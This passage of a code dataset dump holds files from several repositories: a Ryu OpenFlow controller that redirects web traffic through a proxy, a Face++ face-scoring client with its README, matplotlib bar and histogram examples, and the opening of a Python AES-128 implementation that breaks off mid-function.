"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10513, "license_type": "no_license", "max_line_length": 127, "num_lines": 233, "path": "/访问限制/proxy_access.py", "repo_name": "ysywh/match", "src_encoding": "UTF-8", "text": "# Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\nfrom ryu.ofproto import ofproto_v1_3_parser\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import arp\nfrom ryu.lib.packet import ipv4\nfrom ryu.ofproto import inet\nfrom ryu.ofproto import ether\n\nfrom ryu.lib import hub\n\ndetect_ip = '10.0.0.99'\ndetect_mac = '00:00:00:00:00:99'\nhost_proxy = '10.0.0.1'\nweb_server = '10.0.0.3'\nweb_proxy = '10.0.0.4'\n\n\nclass ProxyAccess(app_manager.RyuApp):\n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n\n def __init__(self, *args, **kwargs):\n super(ProxyAccess, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n self.ip_to_mac = {}\n self.dps = []\n self.web_server_dp = None\n hub.spawn(self._redirect)\n\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n print 
\"successfully connect switch(dpid:%d)\" % (datapath.id)\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n self.dps.append(datapath)\n # add goto table 1 flow entry on table 0\n match = parser.OFPMatch()\n inst = [parser.OFPInstructionGotoTable(table_id=1)]\n self.add_flow(datapath, 0, match, table_id=0, inst=inst)\n # install table-miss flow entry on table 1\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions, table_id=1)\n\n def add_flow(self, datapath, priority, match, actions=[], table_id=0,\n idle_timeout=0, hard_timeout=0, buffer_id=None, inst=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n if not inst:\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if buffer_id:\n mod = parser.OFPFlowMod(datapath=datapath, table_id=table_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout,\n buffer_id=buffer_id, priority=priority, match=match, instructions=inst)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, table_id=table_id, idle_timeout=idle_timeout,\n hard_timeout=hard_timeout, match=match, instructions=inst)\n datapath.send_msg(mod)\n\n # install redirect flows\n def _redirect(self):\n hub.sleep(3)\n self.ip_to_mac.setdefault(host_proxy)\n self.ip_to_mac.setdefault(web_server)\n self.ip_to_mac.setdefault(web_proxy)\n\n # detect mac of host_proxy web_server and web_proxy\n flag = False\n while not flag:\n flag = True\n for ip_addr in self.ip_to_mac.keys():\n if not self.ip_to_mac[ip_addr]:\n flag = False\n if flag:\n break\n for ip_addr in self.ip_to_mac.keys():\n if not self.ip_to_mac[ip_addr]:\n self.detect_mac(ip_addr)\n hub.sleep(3)\n\n ofproto = ofproto_v1_3\n parser = ofproto_v1_3_parser\n # install flow-entry prevent common host from visiting web_proxy\n match = parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP, ipv4_dst=web_proxy,\n ip_proto=inet.IPPROTO_TCP, tcp_dst=80)\n actions = 
[]\n self.add_flow(\n self.web_server_dp, 5, match, actions=actions, table_id=0)\n print \"install flow-entry: prevent host derectly visit web_proxy(%s) \\\n on switch %s\" % (web_proxy, self.web_server_dp.id)\n\n hub.sleep(20)\n # install rederict flow-enty that flow src_ip is host_proxy\n match = parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP, ipv4_src=host_proxy, ipv4_dst=web_server,\n ip_proto=inet.IPPROTO_TCP, tcp_dst=80)\n set_proxy_mac_dst = parser.OFPActionSetField(\n eth_dst=self.ip_to_mac[web_proxy])\n set_proxy_ip_dst = parser.OFPActionSetField(ipv4_dst=web_proxy)\n actions = [set_proxy_mac_dst, set_proxy_ip_dst]\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions),\n parser.OFPInstructionGotoTable(table_id=1)]\n self.add_flow(self.web_server_dp, 10, match, table_id=0, inst=inst)\n\n # install rederict flow-enty that flow src_ip is web_proxy\n match = parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP, ipv4_src=web_proxy, ipv4_dst=host_proxy,\n ip_proto=inet.IPPROTO_TCP, tcp_src=80)\n set_server_mac_src = parser.OFPActionSetField(\n eth_src=self.ip_to_mac[web_server])\n set_server_ip_src = parser.OFPActionSetField(ipv4_src=web_server)\n actions = [set_server_mac_src, set_server_ip_src]\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions),\n parser.OFPInstructionGotoTable(table_id=1)]\n self.add_flow(self.web_server_dp, 10, match, table_id=0, inst=inst)\n\n # send detect_arp request to acquire host_proxy web_server\n # and web_proxy mac\n def detect_mac(self, ip_addr):\n pkt = packet.Packet()\n eth_r = ethernet.ethernet(ethertype=ether.ETH_TYPE_ARP,\n dst='ff:ff:ff:ff:ff:ff',\n src=detect_mac)\n arp_r = arp.arp(opcode=1, src_mac=detect_mac, src_ip=detect_ip,\n dst_mac='00:00:00:00:00:00', dst_ip=ip_addr)\n pkt.add_protocol(eth_r)\n pkt.add_protocol(arp_r)\n pkt.serialize()\n for datapath in self.dps:\n actions = [\n datapath.ofproto_parser.OFPActionOutput(port=datapath.ofproto.OFPP_FLOOD)]\n arp_request = 
datapath.ofproto_parser.OFPPacketOut(datapath=datapath,\n in_port=datapath.ofproto.OFPP_CONTROLLER,\n buffer_id=datapath.ofproto.OFP_NO_BUFFER,\n actions=actions,\n data=pkt.data\n )\n datapath.send_msg(arp_request)\n print \"send detect_arp request:i am %s,who is %s\" % (detect_ip, ip_addr)\n\n # recieve detect_arp reply to acquire host_proxy web_server\n # and web_proxy mac and datapath directly connecting the web_server\n def arp_reply_handler(self, msg, datapath, eth, arp):\n if (arp.opcode == 2) and (eth.dst == detect_mac):\n for ip_addr in self.ip_to_mac.keys():\n if arp.src_ip == ip_addr:\n print \"detect_arp reply:i am %s,my mac is %s\" % (ip_addr, eth.src)\n self.ip_to_mac[ip_addr] = eth.src\n if arp.src_ip == web_server:\n self.web_server_dp = datapath\n print \"i am web_server,ip is %s, derectly connect switch(dpid:%s)\" % (web_server, datapath.id)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n # If you hit this you might want to increase\n # the \"miss_send_length\" of your switch\n if ev.msg.msg_len < ev.msg.total_len:\n self.logger.debug(\"packet truncated: only %s of %s bytes\",\n ev.msg.msg_len, ev.msg.total_len)\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocols(ethernet.ethernet)[0]\n dst = eth.dst\n src = eth.src\n\n # handle arp to learn mac and datapath directly\n if(eth.ethertype == ether.ETH_TYPE_ARP):\n arp_r = pkt.get_protocol(arp.arp)\n if (arp_r.src_ip == detect_ip) or (arp_r.dst_ip == detect_ip):\n self.arp_reply_handler(\n msg, datapath, eth, pkt.get_protocol(arp.arp))\n # return to prenvent from detect ip flood\n return\n\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n\n self.logger.info(\"packet in %s %s %s %s\", dpid, src, dst, in_port)\n\n # learn a mac address to avoid FLOOD next time.\n self.mac_to_port[dpid][src] = 
in_port\n\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n\n actions = [parser.OFPActionOutput(out_port)]\n\n # install a flow to avoid packet_in next time\n if out_port != ofproto.OFPP_FLOOD:\n match = parser.OFPMatch(in_port=in_port, eth_dst=dst)\n # verify if we have a valid buffer_id, if yes avoid to send both\n # flow_mod & packet_out\n if msg.buffer_id != ofproto.OFP_NO_BUFFER:\n self.add_flow(datapath, 1, match, actions, table_id=1,\n idle_timeout=10, hard_timeout=10, buffer_id=msg.buffer_id)\n else:\n self.add_flow(datapath, 1, match, actions, table_id=1,\n idle_timeout=10, hard_timeout=10)\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n if (out_port == ofproto.OFPP_FLOOD) or (msg.buffer_id == ofproto.OFP_NO_BUFFER):\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,\n in_port=in_port, actions=actions, data=data)\n datapath.send_msg(out)\n" } ]
4
qzylalala/FaceScoring
https://github.com/qzylalala/FaceScoring
7acad44c70b829f286778e52c50b7e2586d091fc
2e18268e997060f1be0a4eb86aa9893823a9e2b4
2aa66e8adb105205532ae4a05158265e66d9ed70
refs/heads/master
2022-12-08T18:27:59.008570
2020-09-14T12:35:47
2020-09-14T12:35:47
295,409,138
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5606468915939331, "alphanum_fraction": 0.5822102427482605, "avg_line_length": 35.591548919677734, "blob_id": "aed77e90fe6492d65e911d0147254f7dfff006ae", "content_id": "d3030e29ce0e4ec52ab9dc86357738a3510047e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2597, "license_type": "permissive", "max_line_length": 144, "num_lines": 71, "path": "/FaceppApi.py", "repo_name": "qzylalala/FaceScoring", "src_encoding": "UTF-8", "text": "# -*-coding:utf-8-*-\n'''\n@author : qzylalala\n@file : FaceppApi.py\n@time : 2020-09-07 19:04\n'''\nimport urllib.request\nimport urllib.error\nimport json\nimport time\n\n\nhttp_url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'\nkey = \"xxx\"\nsecret = \"xxx\"\n# use your own key and secret key\n\n#---------------------------------------------------------------------------------------------------#\ndef get_info(file_path):\n boundary = '----------%s' % hex(int(time.time() * 1000))\n data = []\n data.append('--%s' % boundary)\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'api_key')\n data.append(key)\n data.append('--%s' % boundary)\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'api_secret')\n data.append(secret)\n data.append('--%s' % boundary)\n fr = open(file_path, 'rb')\n data.append('Content-Disposition: form-data; name=\"%s\"; filename=\" \"' % 'image_file')\n data.append('Content-Type: %s\\r\\n' % 'application/octet-stream')\n data.append(fr.read())\n fr.close()\n data.append('--%s' % boundary)\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'return_landmark')\n data.append('1')\n data.append('--%s' % boundary)\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'return_attributes')\n data.append(\n \"gender,age,smiling,headpose,facequality,blur,eyestatus,emotion,ethnicity,beauty,mouthstatus,eyegaze,skinstatus\")\n data.append('--%s--\\r\\n' % boundary)\n\n 
for i, d in enumerate(data):\n if isinstance(d, str):\n data[i] = d.encode('utf-8')\n\n http_body = b'\\r\\n'.join(data)\n\n # build http request\n req = urllib.request.Request(url=http_url, data=http_body)\n\n # header\n req.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)\n\n try:\n # post data to server\n resp = urllib.request.urlopen(req, timeout=5)\n # get response\n qrcont = resp.read()\n # if you want to load as json, you should decode first,\n # for example: json.loads(qrount.decode('utf-8'))\n face_attr = json.loads(qrcont.decode('utf-8'))\n dict = face_attr[\"faces\"][0]['attributes']\n # print(dict)\n print(dict['gender']['value'])\n print(dict['age']['value'])\n print(dict['beauty']['male_score'] + 10)\n print(dict['beauty']['female_score'] + 10)\n # 'emotion': {'anger': 0.19, 'disgust': 0.017, 'fear': 0.003, 'happiness': 0.003, 'neutral': 99.532, 'sadness': 0.25, 'surprise': 0.005}\n except urllib.error.HTTPError as e:\n print(e.read().decode('utf-8'))" }, { "alpha_fraction": 0.6962552070617676, "alphanum_fraction": 0.7184466123580933, "avg_line_length": 17.461538314819336, "blob_id": "764973d315235c9f1adb2b0e5c379b53bdb26c95", "content_id": "9748779be7ac53d614fe389b9bf9e03c5c8f6148", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1203, "license_type": "permissive", "max_line_length": 143, "num_lines": 39, "path": "/README.md", "repo_name": "qzylalala/FaceScoring", "src_encoding": "UTF-8", "text": "## Face_detection and Face_scoring\n\n### 文件组成\n\n```markdown\n两个人脸检测的库(不用管):\n\t1. dlib_face_recognition_resnet_model_v1.dat\n\t2. shape_predictor_68_face_landmarks\n\n代码部分\n\t3. GetFace.py (利用上面两个库, 调用摄像头资源进行打分)\n \t4. FaceppApi.py (调用face++的 API, 进行人脸打分)\n \n文件保存\n\t5. faces文件夹保存获取的图像\n```\n\n\n\n### 使用说明\n\n```markdown\n注意事项\n1. 路径使用的是相对路径, 应该不会有问题\n2. GetFace.py import 了 FaceppApi。 因此直接运行GetFace.py即可\n3. 
注意, 每次运行程序默认都是从 person1 开始(这里不懂看代码), 因此,尽量只运行一次。若要运行多次,则必须\t删除原来faces文件夹中的所有图片(放在别的地方也行,保证faces文件夹为空即可)\n\n\n使用说明\n4. 运行 GetFace.py 稍等一会儿就会调用摄像头资源. 首先按 N 键 创建文件夹(每个人单独一个文件夹,在faces\t内部) , 摆好姿势后, 按 S 键存储当前图片, 稍等片刻即可输出识别结果(gender, age, male_socre, \tfemale_socre)\n```\n\n\n\n### 环境依赖\n\n``` markdown\nAnaconda3.7 + dlib + cv2 + numpy + urllib + json\n```\n\n" } ]
2
szczepanski/python-matplotlib
https://github.com/szczepanski/python-matplotlib
68414833c6a8defb83bb5d5ffc229bd8deb7bc21
57b20ad2e90fc4d6dfd54c67bc1f564bdd830bf3
f15650d2149bbfb847b2b73ace37d71c7a2b9a6c
refs/heads/master
2020-03-08T14:51:48.059742
2018-07-05T07:33:23
2018-07-05T07:33:23
128,196,260
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5860113501548767, "alphanum_fraction": 0.6606805324554443, "avg_line_length": 20.353534698486328, "blob_id": "8455f3bdbfb2232879477a17f0de7deddaa88892", "content_id": "a8caf1c10c4bc455836211c2434598143e4b161d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2116, "license_type": "no_license", "max_line_length": 93, "num_lines": 99, "path": "/README.md", "repo_name": "szczepanski/python-matplotlib", "src_encoding": "UTF-8", "text": "Piotr Szczepanski\n\n# python-matplotlib\n<br>\nReferences:\n\nhttps://www.udemy.com/data-visualization-with-python-and-matplotlib/learn/v4/content\n<br>\n<br>\n<br>\n# python-matplotlib\n\n## Basic Graph\n\n```python\n#!/usr/bin/env python\n# basic 2 plot graph\nimport matplotlib.pyplot as plt\n\n# 1st plot\nx1 = [1, 2, 3, 4, 5]\ny1 = [6, 7, 4, 5, 2]\n\n# 2nd plot\nx2 = [2, 4, 7, 3, 4]\ny2 = [3, 3, 4, 6, 4]\n\n# 3rd argument - label name => to be used in legend\nplt.plot(x1, y1, label='1st plot')\nplt.plot(x2, y2, label='2nd plot')\n\nplt.title('Basic Graph \\n'\n 'with a new line subtitle')\nplt.xlabel('x axis label')\nplt.ylabel('y axis label')\nplt.legend()\nplt.show()\n\n```\n## Basic bar chart\n\n```python\n#!/usr/bin/env python\n# basic 2 plot bar chart\nimport matplotlib.pyplot as plt\n\n# 1st plot\nx1 = [1, 2, 3, 4, 5]\ny1 = [6, 7, 4, 5, 2]\n\n# 2nd plot\nx2 = [2, 4, 7, 3, 6]\ny2 = [3, 3, 4, 6, 4]\n\n# 3rd argument - label name => to be used in legend\nplt.bar(x1, y1, label = '1st plot', color = 'g')\nplt.bar(x2, y2, label = '2nd plot', color = 'r')\n\nplt.title('Basic Bar chart\\n with a new line subtitle')\nplt.xlabel('x axis label')\nplt.ylabel('y axis label')\nplt.legend()\nplt.show()\n\n```\n## Basic automated bar chart - for larger data sets\n\n```python\n#!/usr/bin/env python\n# basic automated bar chart with larger data set\nimport matplotlib.pyplot as plt\ndata_set = [10,22,32,45,15,99,63,56,23,89,55,43,17,93,24]\nx= [x for x in 
range(len(data_set))]\n\nplt.bar(x, data_set)\nplt.show()\n```\n## Basic histogram chart with bins option - containers - grouping\n\n```python\n#!/usr/bin/env python\n# basic histogram chart with larger data set and bins option - containers - grouping\n\nimport matplotlib.pyplot as plt\n\n# data_set values all above 40\ndata_set = [41,77,88,44,45,55,99,63,56,99,89,55,43,78,93,49]\n\n# bins serve a function of containers in this case for all values in data set (all are >= 40)\nbins = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n\n# cumulative=True - sort bars in ascending order, rwidth - bar width\nplt.hist(data_set, bins, histtype='bar', cumulative=True, rwidth=0.8)\nplt.show()\n```\n\n## Styles with matplotlib\n\n## Alpha transparent\n\n" }, { "alpha_fraction": 0.6294430494308472, "alphanum_fraction": 0.6498740315437317, "avg_line_length": 43.63750076293945, "blob_id": "6a864205907139b3831a5574cada7f991b6a2fee", "content_id": "f515b64227582611fd5c0cad28ec1f19a5f193fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3573, "license_type": "no_license", "max_line_length": 123, "num_lines": 80, "path": "/bar_plot_1.py", "repo_name": "szczepanski/python-matplotlib", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n\ndata_set = np.loadtxt(open(\"/Users/piotr/projects/python/2x/matplotlib_testing/data_set\"),\n dtype={\n 'names': ('traffic_class','y_axis_values','x_axis_label','y_axis_label','title'),\n 'formats': ('|S150', np.float, '|S150', '|S150', '|S150')},\n delimiter=',', unpack=True,skiprows=1)\n\n\ncolors = [u'indigo', u'gold', u'firebrick', u'indianred', u'yellow', u'darkolivegreen', u'darkseagreen',u'midnightblue',\n u'darkorange', u'darkslategrey', u'mediumvioletred', u'mediumorchid', u'mediumslateblue',u'salmon',u'pink',\n u'black', u'springgreen', u'orange', u'brown', u'turquoise', u'olivedrab',u'slategrey',u'peachpuff',u'dimgray',\n u'cyan', 
u'silver', u'skyblue', u'gray', u'darkturquoise', u'goldenrod', u'darkgreen', u'darkviolet',\n u'darkgray', u'teal', u'darkmagenta', u'yellowgreen',u'blueviolet',u'y', u'mediumaquamarine', u'darkorchid',\n u'thistle', u'violet', u'navy', u'dimgrey', u'orchid', u'blue',u'cornflowerblue', u'palegoldenrod',\n u'darkblue', u'coral', u'darkkhaki', u'mediumpurple', u'red', u'bisque', u'slategray',u'hotpink',u'm',\n u'darkcyan',u'khaki', u'wheat', u'deepskyblue', u'rebeccapurple', u'darkred', u'steelblue',u'tomato',\n u'gainsboro', u'c', u'mediumturquoise', u'g', u'k', u'purple', u'burlywood', u'darksalmon',u'powderblue',\n u'greenyellow', u'royalblue', u'sienna', u'orangered', u'lime', u'palegreen', u'mistyrose', u'seashell',\n u'mediumspringgreen', u'fuchsia', u'chartreuse', u'blanchedalmond', u'peru', u'aquamarine',\n u'darkslategray', u'darkgoldenrod', u'lawngreen', u'chocolate', u'crimson',u'seagreen', u'mediumblue',\n u'forestgreen', u'darkgrey', u'olive', u'b', u'moccasin',u'green', u'paleturquoise',\n u'limegreen', u'saddlebrown', u'grey', u'darkslateblue', u'r', u'deeppink', u'plum',u'rosybrown',\n u'cadetblue', u'dodgerblue', u'maroon', u'sandybrown', u'aqua', u'magenta', u'tan',u'palevioletred',\n u'mediumseagreen', u'slateblue']\n\n# y - data_set\ny = data_set[1]\n\n# x - 0 to the length of dataset(y)\nx = [x for x in range(1, len(y)+1)]\n\n# Legend - names\nlegend_names = data_set[0]\n\nx_axis_label = data_set[2][0]\ny_axis_label = data_set[3][0]\nplot_title = data_set[4][0]\n\nfig = plt.figure()\n\n\nax1 = plt.subplot2grid((8,5), (0,0), rowspan=6, colspan=5)\nax1.set_facecolor('white')\nax1.spines['left'].set_color('lightgrey')\nax1.spines['bottom'].set_color('lightgrey')\nax1.spines['top'].set_visible(False)\nax1.spines['right'].set_visible(False)\nax1.set_xticks(x)\n\n\nax1.set_title(plot_title)\nfor index, val in enumerate(y):\n ax1.bar(x[index], y[index], 1, label=legend_names[index], alpha=0.5, color=random.sample(colors, 30))\nfor a,b in zip(x, y):\n 
plt.text(a, b, str(b), ha='center', color='grey')\nax1.set_xlabel(x_axis_label)\nax1.set_ylabel(y_axis_label)\n\n\nax2 = plt.subplot2grid((8, 5), (6, 0), rowspan=2, colspan=5)\nax2.set_facecolor('white')\nax2.spines['left'].set_visible(False)\nax2.spines['bottom'].set_visible(False)\nax2.spines['top'].set_visible(False)\nax2.spines['right'].set_visible(False)\nax2.set_xticks([], minor=False)\nax2.set_yticks([], minor=False)\n\nhandles, labels = ax1.get_legend_handles_labels()\nlegend = ax2.legend(handles, labels, loc='center', framealpha=0.1, ncol=4, prop={'size':8}, fancybox=True, borderaxespad=0)\nfor text in legend.get_texts():\n text.set_color(\"grey\")\n\nplt.subplots_adjust(wspace=0.2, hspace=2)\n\nplt.show()\n\n\n" } ]
2
overxfl0w/AES-128
https://github.com/overxfl0w/AES-128
b3688a9cc429392d8b6465c92aa60eda5702e36c
c22c105a50e8885ae7878eeb06b6a421b596f9b5
418ff8e76f9f4a5ae710802cacfe0002f6f935ad
refs/heads/master
2016-09-06T05:39:53.506360
2014-09-20T14:50:32
2014-09-20T14:50:32
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5291164517402649, "alphanum_fraction": 0.6394466757774353, "avg_line_length": 33.86770248413086, "blob_id": "6d35cae251e5d8ba3119487bf8794980162cc9db", "content_id": "6b501f05146fcf9643e1f826c222101defd27635", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8966, "license_type": "no_license", "max_line_length": 129, "num_lines": 257, "path": "/aes.py", "repo_name": "overxfl0w/AES-128", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" CONSTANTS \"\"\"\n\nsbox = [ 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,\n\t\t\t0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,\n\t\t\t0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,\n\t\t\t0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,\n\t\t\t0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,\n\t\t\t0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,\n\t\t\t0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,\n\t\t\t0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,\n\t\t\t0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,\n\t\t\t0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,\n\t\t\t0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,\n\t\t\t0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,\n\t\t\t0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,\n\t\t\t0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 
0xB9, 0x86, 0xC1, 0x1D, 0x9E,\n\t\t\t0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,\n\t\t\t0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16]\n \nrcon = [[0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36],\n\t\t[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],\n\t\t[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],\n\t\t[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]]\n\t\t\nrgfield = [[0x02,0x03,0x01,0x01],\n\t\t [0x01,0x02,0x03,0x01],\n\t\t [0x01,0x01,0x02,0x03],\n\t\t [0x03,0x01,0x01,0x02]]\n\t\t \ncnst = 0b00011011 # Constant XOR multiplication value \n\nclass libutils:\n\t\n\t## Example of use libutils._changecolumn(antKey,[0x09,0xcf,0x4f,0x3c],0) ##\n\t@staticmethod\n\tdef _changecolumn(block,column,n): \n\t\tfor i in xrange(4):\n\t\t\tblock[i][n] = column[i]\n\t\treturn block\n\t\t\n\t## PRECONDITION n<=col(block) ##\n\t@staticmethod\n\tdef _getcolumn(block,n):\n\t\treturn [block[i][n] for i in xrange(len(block))]\n\t\n\t@staticmethod\n\tdef _getallcolumns(block):\n\t\treturn [libutils._getcolumn(block,n) for n in xrange(len(block))]\n\t\t\n\t@staticmethod\n\t## Change first byte at last byte of the column ##\n\tdef _rotword(column):\n\t\ttmp = column[0]\n\t\tfor i in xrange(len(column)-1):\n\t\t\tcolumn[i] = column[i+1]\n\t\tcolumn[len(column)-1] = tmp\n\t\treturn column\n\t\n\t@staticmethod\n\t## Make SubBytes process applied to column ##\n\tdef _subbytes(column):\n\t\treturn [sbox[i] for i in column]\n\t\n\t@staticmethod\n\t## Make SubBytes process applied to matrix ##\n\tdef _subbytesmatrix(matrix):\n\t\tfor i in xrange(len(matrix)):\n\t\t\tfor j in xrange(len(matrix)):\n\t\t\t\tmatrix[i][j] = sbox[matrix[i][j]]\n\t\treturn matrix\n\t\t\n\t@staticmethod\n\t## Xor 3 columns -> key schedule col1 xor col2 xor Rcon[i] ##\n\t## PRECONDITION len(col1) == len(col2) == len(col3) ##\n\tdef _xor3columns(col1,col2,col3):\n\t\treturn [col1[i] ^ col2[i] ^ col3[i] 
for i in xrange(len(col1))]\n\t\t\n\t@staticmethod\n\t## Xor 2 columns ##\n\t## PRECONDITION: len(col1) == len(col2) ##\n\tdef _xor2columns(col1,col2):\n\t\treturn [col1[i] ^ col2[i] for i in xrange(len(col1))]\n\t\n\t@staticmethod\n\t## Build matrix by columns ##\n\tdef _buildmatrixcol(*args):\n\t\tmatrix = [[0x00]*len(args) for i in xrange(len(args))]\n\t\tfor i in xrange(len(args)):\n\t\t\tlibutils._changecolumn(matrix,args[i],i)\n\t\treturn matrix\n\t\n\t@staticmethod\n\t## AddRoundKey process ##\n\t## PRECONDITION: Square matrices (4x4 in this case)\n\tdef _addroundkey(matrix1,matrix2):\n\t\tmatrix = [[0x00]*4 for i in xrange(len(matrix1))]\n\t\tfor i in xrange(len(matrix1)):\n\t\t\tmatrix = libutils._changecolumn(matrix,libutils._xor2columns(libutils._getcolumn(matrix1,i),libutils._getcolumn(matrix2,i)),i)\n\t\treturn matrix\n\t\n\t@staticmethod\n\t## Rotate fil n of matrix i times ##\n\t## Trick: << i -> pos[0] = pos[i], pos[1] = pos[(1+i)%3], pos[2] = pos[(2+i)%3], pos[3] = pos[(3+i)%3]\n\tdef _rotate(fil,n,i):\n\t\tauxfil = [p for p in fil]\n\t\tfor j in xrange(len(fil)):\n\t\t\tfil[j] = 0x00 | auxfil[(j+i)%len(fil)]\n\t\treturn fil\n\t\t\n\t@staticmethod\n\t## ShiftRows process ##\n\tdef _shiftrows(matrix):\n\t\tfor i in xrange(len(matrix)):\n\t\t\t# Rotate fil i, i times #\n\t\t\tmatrix[i] = libutils._rotate(matrix[i],i,i)\n\t\treturn matrix\n\n\n\t@staticmethod\n\t## MixColumns process ##\n\t## PRECONDITION: 8-bits elements in matrix, else it will be truncated at 8-bits or filled with zeros ##\n\tdef _mixcolumns(matrix):\n\t\tactCol = []\n\t\tacum = 0x00\n\t\tendCol = 